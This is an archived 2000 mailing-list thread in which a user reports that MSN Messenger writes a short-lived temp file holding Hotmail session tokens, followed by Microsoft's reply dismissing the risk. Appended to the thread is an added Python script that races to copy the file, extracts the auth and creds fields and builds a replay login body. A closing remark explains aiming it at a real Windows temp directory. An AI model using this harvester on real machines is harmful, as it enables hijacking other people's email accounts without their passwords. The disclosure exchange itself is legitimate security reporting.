Vulnerability Development mailing list archives

[Fwd: RE: security in MSN messenger service [MSRC 180]]


From: John@BRAHY.COM (John Brahy)
Date: Mon, 17 Apr 2000 12:21:15 -0700


Well, secure@microsoft.com seems to think that this vulnerability is
completely theoretical. I think that Microsoft security is completely
theoretical, but everyone is entitled to their opinion.

John
-------- Original Message --------
Subject: RE: security in MSN messenger service [MSRC 180]
   Date: Mon, 17 Apr 2000 11:13:32 -0700
   From: Microsoft Security Response Center <secure@microsoft.com>
     To: "'John Brahy'" <John@brahy.com>

Hi John -

Thanks for your note.  We've investigated the report that you sent, and
I wanted to get back in touch to let you know what we found out.  You're
right that the file could be used to effect a logon to Hotmail.
However, it's only written to the machine after you've already provided
bona fide logon credentials, and it's deleted within seconds of being
written to the machine.  In addition, it doesn't contain any plaintext
passwords or other authentication information.  So, the potential
exposure here would be from a case in which a user could (a) get you to
log onto Hotmail or MSN Messenger, (b) get you to leave your computer
unattended and (c) do this with exactly the right timing in order to
copy the file during the very short period that it exists.  However, if
a malicious user has physical access to your machine, he already has de
facto control over it -- he could, for instance, simply install software
to display a bogus Hotmail logon screen and collect your password that
way.

I hope that helps answer the question.  If we've missed something,
please let me know, as we'd be happy to continue looking into the
issue.  Regards,

Secure@microsoft.com

-----Original Message-----
From: John Brahy [mailto:John@Brahy.com]
Sent: Saturday, April 15, 2000 3:43 PM
To: Microsoft Security Response Center
Subject: security in MSN messenger service

I have noticed that when I check email from MSN Messenger, it writes a
temp file to C:\windows\temp\sfd4080.htm.
The contents of that file are below. What I have found is that if that
file is saved, you can use it as a redirect to hotmail without using a
password. I wonder what a "while true" loop looking in c:\windows\temp\
would be able to capture? Session seems to time out around 5 minutes.
When that happens, the "creds" value changes but not the auth.

------------START-OF-HTML----------------------
<html>
<head>
<noscript>
<meta http-equiv="Refresh" content="0; url=http://www.hotmail.com">
</noscript>
</head>
<body onload="document.pform.submit(); ">
<form name="pform"
action="http://www.hotmail.msn.com/ppsecure/domessengerlogin"
method="POST">
<input type="hidden" name="mode" value="ttl">
<input type="hidden" name="login" value="jbrahy">
<input type="hidden" name="username" value="jbrahy@hotmail.com">
<input type="hidden" name="sid" value="507">
<input type="hidden" name="kv" value="2">
<input type="hidden" name="id" value="2">
<input type="hidden" name="sl" value="7313">
<input type="hidden" name="rru" value="/cgi-bin/HoTMaiL">
<input type="hidden" name="auth" value="(58 characters)">
<input type="hidden" name="creds" value="(32 characters)">
<input type="hidden" name="svc" value="mail">
<input type="hidden" name="js" value="yes">
</form>
</body>
</html>
------------END-OF-HTML----------------------

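The "while true" loop John asks about, as an added example that is not part of the original post or of anything Microsoft shipped: a poller watches a directory for short-lived sfd*.htm files, copies the first fully written one before it is deleted, and pulls the hidden fields out of it. To run offline it races against a simulated writer that creates the file and deletes it 200 ms later, standing in for the behaviour the post describes. The directory, the file-name pattern, the 200 ms lifetime and the 58/32-character auth/creds values are all assumptions (the post shows only the token lengths).

```python
"""Harvest a short-lived MSN Messenger hand-off file and its hidden form fields.

Added example, not code from the post: it simulates the behaviour the post
describes (file written, then deleted seconds later) inside a temporary
directory so it runs offline. The file-name pattern, the token values and
the file lifetime are assumptions.
"""
import glob
import os
import re
import tempfile
import threading
import time
from urllib.parse import urlencode

# Constructed stand-in for sfdNNNN.htm. The post gives only the token lengths,
# so the auth/creds values here are placeholders of the right length.
SAMPLE_AUTH = "A" * 58
SAMPLE_CREDS = "B" * 32
SAMPLE_HTML = """<html>
<head>
<noscript>
<meta http-equiv="Refresh" content="0; url=http://www.hotmail.com">
</noscript>
</head>
<body onload="document.pform.submit(); ">
<form name="pform"
action="http://www.hotmail.msn.com/ppsecure/domessengerlogin"
method="POST">
<input type="hidden" name="mode" value="ttl">
<input type="hidden" name="login" value="jbrahy">
<input type="hidden" name="username" value="jbrahy@hotmail.com">
<input type="hidden" name="rru" value="/cgi-bin/HoTMaiL">
<input type="hidden" name="auth" value="%s">
<input type="hidden" name="creds" value="%s">
<input type="hidden" name="svc" value="mail">
</form>
</body>
</html>
""" % (SAMPLE_AUTH, SAMPLE_CREDS)

# Matches each <input> whose name attribute precedes its value attribute,
# which is how the captured file lays them out.
HIDDEN_RE = re.compile(r'<input[^>]*?name="([^"]+)"[^>]*?value="([^"]*)"', re.I)
ACTION_RE = re.compile(r'<form[^>]*?action="([^"]+)"', re.I)


def parse_hidden_fields(html):
    """Return {name: value} for every <input> in the captured page."""
    return dict(HIDDEN_RE.findall(html))


def form_action(html):
    """Return the URL the page would auto-POST the fields to, or None."""
    m = ACTION_RE.search(html)
    return m.group(1) if m else None


def harvest(directory, pattern="sfd*.htm", timeout=2.0, poll=0.01):
    """The 'while true' loop from the post, with a deadline so it terminates.

    Polls `directory` for files matching `pattern`, reads each one it finds
    and returns (path, text) for the first that is completely written. A file
    that vanishes between listing and open is skipped. Returns None on timeout.
    """
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        for path in glob.glob(os.path.join(directory, pattern)):
            try:
                with open(path, encoding="utf-8") as fh:
                    text = fh.read()
            except (FileNotFoundError, PermissionError):
                continue  # deleted, or still locked by the writer; try again
            if "</html>" in text.lower():  # a partial write is not worth keeping
                return path, text
        time.sleep(poll)
    return None


def simulated_messenger(directory, html, lifetime=0.2):
    """Stand-in writer: create the hand-off file, wait, delete it."""
    path = os.path.join(directory, "sfd4080.htm")
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(html)
    time.sleep(lifetime)
    for _ in range(50):  # on Windows the delete fails while the reader holds the file open
        try:
            os.remove(path)
            break
        except PermissionError:
            time.sleep(0.01)


def demo(lifetime=0.2):
    """Race the simulated writer against the watcher; return what was captured."""
    with tempfile.TemporaryDirectory() as tmp:
        writer = threading.Thread(target=simulated_messenger, args=(tmp, SAMPLE_HTML, lifetime))
        writer.start()
        captured = harvest(tmp)
        writer.join()
    if captured is None:
        return None
    path, text = captured
    fields = parse_hidden_fields(text)
    return {
        "file": os.path.basename(path),
        "action": form_action(text),
        "fields": fields,
        # Everything needed to replay the login is a plain form body; no
        # password appears in it, which is why the file matters on its own.
        "replay_body": urlencode(fields),
    }


if __name__ == "__main__":
    result = demo()
    if result is None:
        print("nothing captured")
    else:
        print(result["file"], "->", result["action"])
        for name in ("login", "auth", "creds"):
            print(f"  {name} = {result['fields'][name]}")
```

Against a real machine of that era you would drop the simulated writer and point `harvest` at `C:\windows\temp` with a long timeout; all the watcher needs is read access to that directory. The `</html>` check matters because a poll can land between the file being created and being fully written, and a truncated copy has no usable `auth` field.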
